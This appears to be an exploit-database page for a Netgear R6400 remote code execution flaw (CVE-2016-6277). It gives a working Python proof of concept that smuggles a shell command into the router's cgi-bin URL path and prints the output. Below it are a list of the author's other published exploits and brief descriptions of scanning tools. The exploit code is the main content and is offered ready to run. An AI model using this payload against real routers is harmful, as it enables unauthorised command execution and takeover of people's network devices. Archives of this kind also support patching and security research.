Search for hundreds of thousands of exploits

"Netgear R6400 - Remote Code Execution"

Author

Exploit author

"Kevin Randall"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-12-17

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

# PoC

#!/usr/bin/python

import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()
spl_word =  "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result
Release DateTitleTypePlatformAuthor
2020-03-11"CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)"remotewindows"Kevin Randall"
2020-03-11"CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)"remotewindows"Kevin Randall"
2019-12-17"Netgear R6400 - Remote Code Execution"webappshardware"Kevin Randall"
2019-11-18"Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal"webappshardware"Kevin Randall"
2019-06-04"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)"localwindows"Kevin Randall"
2019-04-30"Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow"remotewindows"Kevin Randall"
2019-04-30"Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow"remotewindows"Kevin Randall"
2019-03-26"Titan FTP Server Version 2019 Build 3505 - Directory Traversal / Local File Inclusion"webappswindows"Kevin Randall"
2019-03-13"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal"doswindows"Kevin Randall"
2019-03-13"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal"doswindows"Kevin Randall"
2018-08-30"DLink DIR-601 - Credential Disclosure"webappshardware"Kevin Randall"
2018-04-02"DLink DIR-601 - Admin Password Disclosure"webappshardware"Kevin Randall"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47782/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.